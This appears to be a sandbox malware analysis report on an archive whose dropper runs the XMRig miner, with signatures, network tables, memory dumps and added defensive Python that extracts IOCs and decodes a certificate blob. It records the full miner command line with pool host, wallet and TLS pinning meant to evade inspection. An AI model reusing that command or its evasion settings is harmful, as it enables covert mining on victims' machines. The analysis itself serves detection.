Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 19:07
Signatures
Unsigned PE
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:52
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4100 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4100 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
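The xmrig.exe command line recorded above carries the operator's indicators in the clear: the pool (pool.hashvault.pro:80), the Monero payout address passed as --user, and a pinned pool certificate fingerprint. Two details matter for detection. --tls together with port 80 means the stratum session is TLS on a port that port-based inspection usually treats as HTTP, and --tls-fingerprint pins the pool's certificate by SHA-256, so a TLS-intercepting proxy breaks the session rather than seeing inside it. The SeLockMemoryPrivilege adjustment listed under the signatures is XMRig enabling large pages for its own process; AdjustTokenPrivileges only turns on a privilege the account already holds, so it is not an escalation step. The connections to github.com and objects.githubusercontent.com that precede the miner in the Network table are consistent with the dropper fetching the xmrig-6.21.0 release at run time rather than carrying it embedded, though the report does not show the HTTP exchange itself. The Python below is an added example written for this page, not code from the sandbox, the dropper or the XMRig project: it parses a miner command line into IOCs and flags the points above. The sample command line is the one from this analysis; the second input in the test is constructed, and the function and field names are this example's own.

```python
"""Pull IOCs out of an XMRig command line and flag the detection-relevant details."""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Command line recorded for PID 2400 in this analysis (behavioral3).
SAMPLE_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Monero base58 alphabet (no 0, O, I, l). Standard addresses are 95 chars, integrated ones 106.
_MONERO_B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
_ALIASES = {"-o": "--url", "-u": "--user", "-p": "--pass"}  # xmrig short forms
_BOOLEAN = {"--tls", "--background", "-B", "--no-color", "--keepalive", "-k", "--dry-run"}


@dataclass
class MinerIOCs:
    image: str
    pool_host: str | None = None
    pool_port: int | None = None
    tls: bool = False
    wallet: str | None = None
    tls_fingerprint: str | None = None
    donate_level: int | None = None
    findings: list[str] = field(default_factory=list)


def looks_like_monero_address(value: str) -> bool:
    """Shape check only: network prefix 4/8, base58 alphabet, standard or integrated length."""
    return len(value) in (95, 106) and value[0] in "48" and set(value) <= _MONERO_B58


def _options(argv: list[str]) -> dict[str, str | bool]:
    """Collect --opt value, --opt=value and short -o value pairs; bare flags become True."""
    opts: dict[str, str | bool] = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-"):
            key, eq, val = tok.partition("=")
            key = _ALIASES.get(key, key)
            if eq:
                opts[key] = val
            elif key in _BOOLEAN or i + 1 >= len(argv) or argv[i + 1].startswith("-"):
                opts[key] = True
            else:
                opts[key] = argv[i + 1]
                i += 1
        i += 1
    return opts


def parse_xmrig_cmdline(cmdline: str) -> MinerIOCs:
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    opts = _options(argv)
    r = MinerIOCs(image=argv[0].strip('"'))
    if "xmrig" in r.image.lower():
        r.findings.append("image name matches XMRig")

    url = opts.get("--url")
    if isinstance(url, str):
        # xmrig accepts bare host:port as well as stratum+tcp:// and stratum+ssl:// URLs
        parts = urlsplit(url if "://" in url else "stratum+tcp://" + url)
        r.pool_host, r.pool_port = parts.hostname, parts.port
        r.tls = parts.scheme.endswith(("ssl", "tls"))
    r.tls = r.tls or opts.get("--tls") is True
    if r.tls and r.pool_port == 80:
        r.findings.append("TLS-wrapped stratum on port 80: not HTTP, port-based inspection misclassifies it")

    user = opts.get("--user")
    if isinstance(user, str):
        r.wallet = user
        if looks_like_monero_address(user):
            r.findings.append("--user is a Monero-format wallet address (pool login doubles as payout address)")

    fp = opts.get("--tls-fingerprint")
    if isinstance(fp, str) and re.fullmatch(r"[0-9a-fA-F]{64}", fp):
        r.tls_fingerprint = fp.lower()
        r.findings.append("pool certificate pinned by SHA-256 fingerprint: an intercepting proxy breaks the session")

    level = opts.get("--donate-level")
    if isinstance(level, str) and level.isdigit():
        r.donate_level = int(level)
    return r


if __name__ == "__main__":
    iocs = parse_xmrig_cmdline(SAMPLE_CMDLINE)
    print(f"{iocs.pool_host}:{iocs.pool_port} tls={iocs.tls} wallet={iocs.wallet}")
    for finding in iocs.findings:
        print(" -", finding)
```

The pool host, port and wallet are the values to pivot on across the three behavioral runs here (all three launch with the same --url and --user); the fingerprint is useful for matching the pool's server certificate in TLS telemetry even when the hostname is rotated.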
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2400-16-0x0000020519E50000-0x0000020519E70000-memory.dmp
memory/2400-17-0x000002051A0A0000-0x000002051A0C0000-memory.dmp
memory/2400-18-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-19-0x000002051B890000-0x000002051B8B0000-memory.dmp
memory/2400-20-0x000002051A0C0000-0x000002051A0E0000-memory.dmp
memory/2400-21-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-22-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-25-0x000002051A0C0000-0x000002051A0E0000-memory.dmp
memory/2400-24-0x000002051B890000-0x000002051B8B0000-memory.dmp
memory/2400-23-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-26-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-27-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-28-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-29-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-30-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-31-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-32-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-33-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-34-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-35-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-36-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-37-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-38-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-39-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-40-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-41-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-42-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-43-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-44-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-45-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-46-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-47-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-48-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-49-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-50-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-51-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-52-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-53-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-54-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-55-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-56-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-57-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-58-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-59-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-60-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-61-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-62-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-63-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-64-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-65-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-66-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-67-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-68-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-69-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-70-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-71-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-72-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-73-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-74-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-75-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-76-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-77-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-78-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-79-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-80-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-81-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-82-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-83-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-84-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
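The Blob value written under AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 is a CryptoAPI serialized certificate: a run of records, each a little-endian DWORD property id, a DWORD that is 1 in every record observed here, a DWORD length and the data, ending with CERT_CERT_PROP_ID (0x20) holding the DER certificate. Decoding the visible records gives a friendly name of "Sectigo (AAA)", a SHA-1 property equal to the key name, and subject strings in the DER that read "Comodo CA Limited" and "AAA Certificate Services"; that thumbprint is the public AAA Certificate Services root. Taken together with the AuthRoot store (the one populated by Windows' automatic root update) and the HTTPS connections to github.com and objects.githubusercontent.com in the Network table, the write is consistent with CryptoAPI fetching a missing root during the dropper's download rather than with the dropper planting its own trust anchor. The "Modifies system certificate store" hit is still worth recording, but an analyst should check the thumbprint against Microsoft's trusted root list, and check that the blob's own hashes match the embedded certificate, before calling it tampering. The Python below is an added example for this page, not the sandbox's or XMRig's code: it parses a Blob, names the known properties, and cross-checks the stored hashes against the embedded certificate and the registry key name. The sample is the first eight property records of the blob above, cut before the certificate record to keep it short; the round-trip inputs in the test are constructed, and the function names are this example's own.

```python
"""Decode a CryptoAPI serialized certificate Blob from a SystemCertificates registry key."""
from __future__ import annotations

import hashlib
import struct

# wincrypt.h CERT_*_PROP_ID values for the properties present in the blob above.
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
    0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    0x62: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

# First eight property records of the Blob written under AuthRoot\Certificates\D1EB...E349
# above, truncated before the final CERT_CERT_PROP_ID record (the DER certificate is omitted).
SAMPLE_BLOB_HEX = (
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286"
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"
    "53000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101"
    "030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000"
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb"
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349"
)


def parse_cert_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the (prop_id, 1, length, data) records; raise on a malformed or truncated record."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, version, length = struct.unpack_from("<III", blob, off)
        off += 12
        if version != 1:  # constant 1 in every serialized property observed in this blob
            raise ValueError(f"unexpected record version {version} at offset {off - 8}")
        if off + length > len(blob):
            raise ValueError(f"property {prop_id:#x} runs past end of blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def is_well_formed(blob: bytes) -> bool:
    try:
        parse_cert_blob(blob)
        return True
    except ValueError:
        return False


def build_cert_blob(der: bytes, friendly_name: str, sha1_override: bytes | None = None) -> bytes:
    """Serialize a minimal blob in the same record format (constructed; used for round-trip tests)."""
    records = {
        0x0B: friendly_name.encode("utf-16-le") + b"\x00\x00",
        0x03: sha1_override or hashlib.sha1(der).digest(),
        0x20: der,
    }
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records.items())


def summarize(props: dict[int, bytes], key_name: str | None = None) -> dict:
    """Decode the useful properties and cross-check stored hashes against the embedded certificate."""
    out: dict = {"properties": [PROP_NAMES.get(p, f"0x{p:02x}") for p in props]}
    if 0x0B in props:
        out["friendly_name"] = props[0x0B].decode("utf-16-le").rstrip("\x00")
    if 0x03 in props:
        out["sha1"] = props[0x03].hex()
    if 0x62 in props:
        out["sha256"] = props[0x62].hex()
    if 0x20 in props:
        der = props[0x20]
        sha1, sha256 = hashlib.sha1(der).hexdigest(), hashlib.sha256(der).hexdigest()
        out["cert_sha1"], out["cert_sha256"] = sha1, sha256
        # Stored hashes that disagree with the blob's own certificate were not written by CryptoAPI.
        out["hashes_consistent"] = out.get("sha1", sha1) == sha1 and out.get("sha256", sha256) == sha256
    if key_name and "sha1" in out:
        # The key name under Certificates\ is the SHA-1 thumbprint; a mismatch means a planted entry.
        out["key_matches_sha1"] = key_name.lower() == out["sha1"]
    return out


if __name__ == "__main__":
    result = summarize(parse_cert_blob(bytes.fromhex(SAMPLE_BLOB_HEX)),
                       "D1EB23A46D17D68FD92564C2F1F1601764D8E349")
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the full Blob hex from the row above (including the trailing CERT_CERT_PROP_ID record), summarize() also reports cert_sha1 and cert_sha256 computed from the DER and whether they agree with the stored properties; the same check applied to entries under Root\Certificates rather than AuthRoot is the one that catches a dropper-installed root.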
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3684 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3684 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4592-16-0x000001D791460000-0x000001D791480000-memory.dmp
memory/4592-17-0x000001D7914D0000-0x000001D7914F0000-memory.dmp
memory/4592-18-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-19-0x000001D825520000-0x000001D825540000-memory.dmp
memory/4592-20-0x000001D825750000-0x000001D825770000-memory.dmp
memory/4592-21-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-22-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-25-0x000001D825750000-0x000001D825770000-memory.dmp
memory/4592-24-0x000001D825520000-0x000001D825540000-memory.dmp
memory/4592-23-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-26-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-27-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-28-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-29-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-30-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-31-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
